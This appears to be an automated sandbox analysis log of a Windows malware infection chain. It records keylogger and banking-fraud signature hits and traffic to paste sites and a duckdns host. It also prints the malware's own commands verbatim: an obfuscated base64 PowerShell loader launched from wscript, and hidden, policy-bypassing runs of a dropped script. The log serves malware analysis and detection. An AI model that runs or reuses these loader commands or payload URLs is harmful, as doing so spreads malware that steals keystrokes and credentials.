                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49711 -> 76.76.21.22:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49708 -> 76.76.21.22:443
                        Source: unknownFTP traffic detected: 191.252.83.213:21 -> 192.168.2.5:49704 220 "Servico de FTP da Locaweb"
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /pastes/01922156-0a1a-798a-ba18-d0ce12473978/raw HTTP/1.1Host: pastecodeapp.vercel.appConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /pastes/019220a5-2811-7ab8-829c-a7f4350452e0/raw HTTP/1.1Host: pastecodeapp.vercel.app
                        Source: global trafficHTTP traffic detected: GET /pastes/019220a3-9326-7b46-b740-ef110ecdb453/raw HTTP/1.1Host: pastecodeapp.vercel.app
                        Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: ftp.desckvbrat.com.br
                        Source: global trafficDNS traffic detected: DNS query: pastecodeapp.vercel.app
                        Source: global trafficDNS traffic detected: DNS query: pastebin.com
                        Source: global trafficDNS traffic detected: DNS query: notificadoresrma.duckdns.org
                        Source: powershell.exe, 00000005.00000002.2847112726.00000256B7F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mdHy
                        Source: powershell.exe, 00000002.00000002.3002434212.000001E2ED8B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2444391639.0000020A42535000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2262307910.0000020A28534000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2353901429.000002078DA85000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2420905012.0000020956705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                        Source: powershell.exe, 00000004.00000002.2236815480.000001D394365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://desckvbrat.com.br
                        Source: powershell.exe, 00000004.00000002.2236815480.000001D39475B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://firebasestorage.googleapis.com
                        Source: powershell.exe, 00000004.00000002.2236815480.000001D394365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.desckvbrat.com.br
                        Source: powershell.exe, 00000004.00000002.2236815480.000001D3947B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2856145468.000001D3A2CD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2724257529.00000256AFA70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2661344132.000001F552490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2276224624.0000020F65B7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2178810552.0000020F573ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2276224624.0000020F65CB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 0000000C.00000002.2263158349.0000020A2A9C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2358188672.000002078FF6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.0000020959130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                        Source: powershell.exe, 00000004.00000002.2236815480.000001D3943BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastecodeapp.vercel.app
                        Source: powershell.exe, 00000008.00000002.2178810552.0000020F55D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000005.00000002.2200486936.000002569FC22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2195084850.000001F542643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: powershell.exe, 00000002.00000002.2935786151.000001E2D57DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D392C78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2200486936.000002569FA01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2195084850.000001F542421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2178810552.0000020F55B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2263158349.0000020A2A15D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2358188672.000002078F73A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.00000209588A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000005.00000002.2200486936.000002569FC22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2195084850.000001F542643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 00000008.00000002.2178810552.0000020F56FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: powershell.exe, 00000008.00000002.2178810552.0000020F55D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000005.00000002.2838267967.00000256B7D72000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2444391639.0000020A42535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                        Source: powershell.exe, 00000002.00000002.2935786151.000001E2D5798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                        Source: powershell.exe, 00000002.00000002.2935786151.000001E2D57AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D392C78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2200486936.000002569FA01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2195084850.000001F542421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2178810552.0000020F55B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2263158349.0000020A2A15D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2263158349.0000020A2A14F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2358188672.000002078F6FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2358188672.000002078F6E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.00000209588AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.00000209588BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000008.00000002.2276224624.0000020F65CB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000008.00000002.2276224624.0000020F65CB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000008.00000002.2276224624.0000020F65CB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 00000004.00000002.2231129642.000001D3911C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=
                        Source: powershell.exe, 00000004.00000002.2236815480.000001D39475B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D3931F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleapis.com
                        Source: powershell.exe, 00000004.00000002.2236815480.000001D39475B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D3931F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/descargas-dc4d6.appspot.com/o/envios-nuevos.txt?alt=medi
                        Source: powershell.exe, 00000004.00000002.2236815480.000001D39475B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleh
                        Source: powershell.exe, 00000008.00000002.2178810552.0000020F55D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000004.00000002.2236815480.000001D393C6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: powershell.exe, 00000004.00000002.2856145468.000001D3A2CD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2724257529.00000256AFA70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2661344132.000001F552490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2276224624.0000020F65B7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2178810552.0000020F573ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2276224624.0000020F65CB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 00000008.00000002.2178810552.0000020F56FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                        Source: powershell.exe, 00000008.00000002.2178810552.0000020F56FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                        Source: powershell.exe, 0000000C.00000002.2263158349.0000020A2A709000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2263158349.0000020A2A9C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2358188672.000002078FC86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.000002095912A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.0000020958FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                        Source: powershell.exe, 0000000C.00000002.2263158349.0000020A2A709000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2358188672.000002078FC86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.0000020958FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/pQQ0n3eA
                        Source: powershell.exe, 00000004.00000002.2236815480.000001D3946E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastecodeapp.vX
                        Source: powershell.exe, 00000004.00000002.2236815480.000001D39438F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastecodeapp.vXB
                        Source: powershell.exe, 00000004.00000002.2236815480.000001D392E83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D39323F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D39438F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastecodeapp.vercel.app
                        Source: powershell.exe, 00000004.00000002.2236815480.000001D39323F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D39322F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastecodeapp.vercel.app/pastes/019220a3-9326-7b46-b740-ef110ecdb453/raw
                        Source: powershell.exe, 00000004.00000002.2236815480.000001D39323F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastecodeapp.vercel.app/pastes/019220a3-9326-7b46-b740-ef110ecdb453/rawP
                        Source: powershell.exe, 00000004.00000002.2236815480.000001D3946E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D3946D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D39306F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D39440D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastecodeapp.vercel.app/pastes/019220a5-2811-7ab8-829c-a7f4350452e0/raw
                        Source: powershell.exe, 00000004.00000002.2236815480.000001D3946E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastecodeapp.vercel.app/pastes/019220a5-2811-7ab8-829c-a7f4350452e0/rawP
                        Source: powershell.exe, 00000004.00000002.2236815480.000001D39438F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastecodeapp.vercel.app/pastes/01922156-0a1a-798a-ba18-d0ce12473978/raw
                        Source: powershell.exe, 00000004.00000002.2236815480.000001D39438F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastecodeapp.vercel.app/pastes/01922156-0a1a-798a-ba18-d0ce12473978/rawP
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56147 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56146 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56147
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56146
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                        Source: unknownHTTPS traffic detected: 76.76.21.22:443 -> 192.168.2.5:49706 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49712 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:56146 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:56147 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Source: 12.2.powershell.exe.20a2a7dbe00.1.raw.unpack, Keylogger.cs.Net Code: VKCodeToUnicode
                        Source: 18.2.powershell.exe.2078fd84ec0.0.raw.unpack, Keylogger.cs.Net Code: VKCodeToUnicode
                        Source: 23.2.powershell.exe.20958f44b38.1.raw.unpack, Keylogger.cs.Net Code: VKCodeToUnicode
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00D25F1F GetKeyState,GetKeyState,GetKeyState,15_2_00D25F1F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00D25F30 GetKeyState,GetKeyState,GetKeyState,15_2_00D25F30

                        E-Banking Fraud

                        barindex
                        Source: Yara matchFile source: 23.2.powershell.exe.20958f44b38.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.2.powershell.exe.20958f44b38.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.powershell.exe.20a2a7dbe00.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.powershell.exe.2078fd84ec0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.2.powershell.exe.20958f407d8.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.powershell.exe.20a2a7d7a88.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.powershell.exe.2078fd80b60.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.powershell.exe.20a2a7dbe00.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.powershell.exe.2078fd84ec0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000017.00000002.2442574542.0000020959177000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3000375928.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2263158349.0000020A2AA0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.2358188672.000002078FFB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.2358188672.000002078FC86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.2442574542.0000020958E27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.2386362117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2263158349.0000020A2A709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1088, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5792, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7212, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7428, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7544, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7656, type: MEMORYSTR

                        System Summary

                        barindex
                        Source: Process Memory Space: powershell.exe PID: 2748, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 1088, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 5792, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 7428, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 7656, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8287
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2064
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8287Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2064Jump to behavior
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???Qw
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???QwJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848D633165_2_00007FF848D63316
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00D2E17015_2_00D2E170
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00D25AE815_2_00D25AE8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_05EA004015_2_05EA0040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_05EA9C1815_2_05EA9C18
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_05EA8D4015_2_05EA8D40
